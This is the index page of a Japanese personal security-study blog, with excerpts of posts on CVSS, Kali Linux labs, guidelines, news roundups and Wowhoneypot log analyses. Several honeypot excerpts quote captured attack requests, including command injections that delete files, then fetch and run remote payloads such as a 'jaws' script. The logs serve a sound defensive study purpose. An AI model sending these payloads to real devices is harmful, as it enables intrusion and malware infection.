家studyをつづって

IT技術に関することやセキュリティ、ガイドライン等学んだことをつづっていきます。

CVSSの読み方

概要 脆弱性の深刻度を表すCVSSの読み方について整理しました。 // CVSSとは CVSS(Common Vulnerability Scoring System)は、脆弱性の深刻度を評価するための指標で、FIRST(Forum of Incident Response and Security Teams)により、適用推進や仕様改善が行わ…

Webにおける「オリジン」について整理してみた

概要 最近みたニュースで「オリジン」に触れたものがありました。「オリジン」という言葉について、理解しきれていなかったので整理してみました。 // オリジンとは IPAのサイトでは、以下のような解説がされていました。 3.2. 源泉(origin) English原則と…

インターネット接続環境を1時間以内に用意する方法(プリペイドSIMを買った話)

概要 諸事情あってこれまで使っていたスマホのSIMカードが使えなくなってしまいました。新しいSIMカードが届くまでの数日間、外出先でもLineだけは使えるようにしたいと思い、プリペイドSIMを買ってインターネットに接続できるようにした時の話をまとめます…

Hyper-V上でKali Linuxの検証環境を構築する

概要 個人的に勉強中のCompTIA PenTest+に関連して、Kali Linuxの検証環境(Kali Linuxと攻撃対象のmetasploitable2)をHyper-V上に構築しました。構築した環境のイメージは以下の通りです。 構築した環境イメージ // 環境構築 Kali Linuxのインストール Kal…

Windowsの自動実行機能(AutoRun)について

Windowsの自動実行機能(Autorun)について Windowsには自動実行の機能があります。Windowsの自動実行とは、CD-ROM、DVD、USBメモリ、外付けハードディスク、あるいはネットワークドライブなどをパソコンに挿入/接続したり、そのアイコンをダブルクリックし…

2020年8月のIT・セキュリティトピック

2020年8月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/08/01 7月に発生したTwitterの大規模なアカウント侵害事件、米国で3人が起訴される 2020/08/03 地域銀行の8割がクラウド利用 勘定系などレガシーシステムが壁 2020/08/03 「Emotetウ…

GCP上でWordPressを構築する(独自ドメインの設定、HTTPS対応まで)

概要 GCP上でWordpressを構築しました。今回の構築では以下の内容を実施しますが、使用するのはすべてGoogleが提供しているサービスを利用します。 MarketPlaceを利用したWordpress環境の構築 Google Domainsで独自ドメインを取得 Let's Encryptを使ってHTTP…

MITRE ATT&CKの概要

MITERとは MITREは、米国の連邦政府が資金を提供する非営利組織であり、国の安全性に関する事項に取り組んでいます。サイバーセキュリティの分野では、NISTの連邦研究開発センター(Federally funded research and development center:FFRDC)の運営を行い…

SDP(Software Defined Perimeter)とは

SDPの概要 Software Defined Perimeterは、ネットワークを経由した様々な脅威からインフラや情報を守るための機能です。 最近ではクラウドサービス(社外のサービス)等の活用が増え、従来のファイアウォール等を使った境界型セキュリティでは守り切れないも…

Web会議のセキュリティ注意事項について

概要 コロナの影響もあり最近はリモートワークがに関する話題が多くなっています。それに伴い、Web会議のツールの利用も増えています。Web会議ツールは業務以外にもリモート飲みなどにも使われています。そういった中で、独立行政法人情報処理推進機構は7月1…

2020年7月のIT・セキュリティトピック

2020年7月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/07/01 公取委が目を付けた決済インフラ「CAFIS」の正体 2020/07/01 「NISTプライバシーフレームワーク」の翻訳を無料で提供 2020/07/01 5月のDDoS攻撃、件数は減少するも攻撃規模は…

フィッシング対策ガイドラインの比較(2020年版と2019年版)

概要 フィッシング対策協議会では、フィッシング詐欺の被害を防ぐためにWebサービス事業者に向けた対策をまとめたガイドラインを公開しています。 www.antiphishing.jp 2020年度版では、最近の脅威動向を踏まえ対策要件を見直し、また、優先度の設定が見直さ…

個人情報保護法の2020年改正について

背景 色々なIT技術を使ったサービスが次々に登場し、個人情報を含む、様々な情報が活用されています。個人情報保護法ではそういった社会情勢を踏まえ、平成27年(2015年)より「いわゆる3年ごとの見直し」(附則第12条3項)を設けました。 個人情報保護法は…

2020年6月のIT・セキュリティトピック

2020年6月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/06/01 外出自粛によるECサイト利用増でフィッシングも増(BBSS) 2020/06/01 個人情報流出の54歳市職員、人事に不満か…懲戒免職 2020/06/01 Wi-Fi利用者や提供者向けセキュガイド…

Wowhoneypotログ分析(2020/05/23-2020/05/30)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/23-2020/05/30 ログの集計 送信元 内容 検知数 0 103.113.106.15 \"GET / 1 103.145.12.53 \"GET / 1 103.50.5.230 \"GET / 1 104.248.33.135 \"GET / 1 104.248.92.71…

「Guidelines for Securing Wireless Local Area Networks(WLANs)」の概要 NIST SP800-153

Guidelines for Securing Wireless Local Area Networks(WLANs) NIST Special Publication 800-153 発行年月日:2012年2月 https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf // 概要 このガイドラインは、NISTが企業の無線LA…

GCPのセキュリティ設定を監査してみた「Scout Suite」

背景など 最近ではクラウドの利用が進んでおり、様々な企業がクラウド上にシステムを構築し、データを格納しています。 ascii.jp クラウドは常に新しい機能が開発されており、クラウドに対する理解が浅いままシステムを構築するとセキュリティの観点からは脆…

「政府情報システムにおけるクラウドサービスの利用に係る基本方針」の概要

政府情報システムにおけるクラウドサービスの利用に係る基本方針 発行年月日:2018年6月7日 https://cio.go.jp/sites/default/files/uploads/documents/cloud_%20policy.pdf // 概要 内閣官房IT総合戦略室は、標準ガイドライン付属文書に「政府情報システム…

Wowhoneypotログ分析(2020/05/18-2020/05/22)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/18-2020/05/22 ログの集計 送信元 内容 検知数 0 105.155.16.59 \"POST /cgi-bin/mainfunction.cgi 1 114.67.202.10 \"GET /TP/public/index.php 1 =1"}">\"GET /TP/pu…

ネットワークセキュリティ製品のテスト基準を策定する「NetSecOpen」

先日、Sonicwallの製品評価に関する記事を読みました。 blog.sonicwall.com 上記の記事に出てきた「NetSecOpen」について調べてみました。 // NetSecOpenとは NetSecOPENは、ネットワークセキュリティベンダー等が参加している、会員制の非営利団体で、ネッ…

Wowhoneypotログ分析(2020/05/11-2020/05/17)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 // 対象期間 2020/05/11-2020/05/17 ログの集計 送信元 内容 検知数 0 110.154.182.132 \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8…

「働き方改革のためのテレワーク導入モデル」の概要

働き方改革のためのテレワーク導入モデル 発行年月日:2019年6月発行者:総務省 https://www.soumu.go.jp/main_content/000616262.pdf // 概要と目的 「働き方改革のためのテレワーク導入モデル」は、テレワーク導入のためのノウハウやプラクティスをまとめ…

Wowhoneypotログ分析(2020/05/01-2020/05/11)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/05/01-2020/05/11 ※一部ログが取得できていない期間がありました。 ログの集計 送信元 内容 検知数 0 1.179.199.114 \"POST /cgi-bin/mainfunction.cgi 2 101.200.122.148 \"…

2020年5月のIT・セキュリティトピック

2020年5月に気になったニュースをまとめます。 // 記事の投稿日 概要 2020/05/01 盗まれたZoomのログイン情報を売買する闇市場が活況 2020/05/01 重要インフラ分野の企業に侵害リスク調査を無償提供、マクニカネットワークス 2020/05/01 三井住友銀 7万件の…

Wowhoneypotログ分析(2020/04/25-2020/04/30)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/25-2020/04/30 ログの集計 送信元 内容 検知数 0 1.70.13.251 \"POST /cgi-bin/mainfunction.cgi 1 103.209.1.230 \"POST /cgi-bin/mainfunction.cgi?action=login&keyPat…

Hyper-v上にKali Linuxをインストールする

概要 Hyper-v上にKali Linuxをインストールしました。今回記事にしたのは、Hyper-vの通常の仮想マシン作成手順でインストールした際に、Kali Linuxのインストールの途中「パッケージの選択とインストール」でエラーが発生しました。そこから試行錯誤しながら…

(ようやく)モバイルPASMOを使ってみた

今更ですが2020年3月18日より、モバイルPASMOのサービスが開始となりました。 japanese.engadget.com 個人的にはかなり期待していました。毎朝、定期券を忘れないように何度も確認しながらも、時々忘れて出てしまい、その度に高い昼ごはんが食べられそうな値…

セキュリティ業務を担う人材のスキル可視化施策について調べてみた

セキュリティ業務を担う人材のスキル可視化ガイドライン 発行者:JNSA 発行年月日:2019年1月18日 https://www.jnsa.org/isepa/images/outputs/JTAG_guideline-%CE%B2_190118.pdf https://www.jnsa.org/isepa/images/outputs/JTAGreport2019.pdf // 目的 JNS…

Wowhoneypotログ分析(2020/04/21-2020/04/24)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/21-2020/04/24 ログの集計 送信元 内容 検知数 0 108.68.60.225 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}…

Wowhoneypotログ分析(2020/04/16-2020/04/18)

概要 以前の記事で構築したWowhoneypotのログを集計した結果です。 対象期間 2020/04/16-2020/04/19 ログの集計 送信元 内容 件数 0 130.43.73.229 GET /shell?cd+/tmp;rm+-rf+*;wget+%20185.172.110.241/jaws;sh+/tmp/jaws 1 154.70.134.71 POST /cgi-bin/m…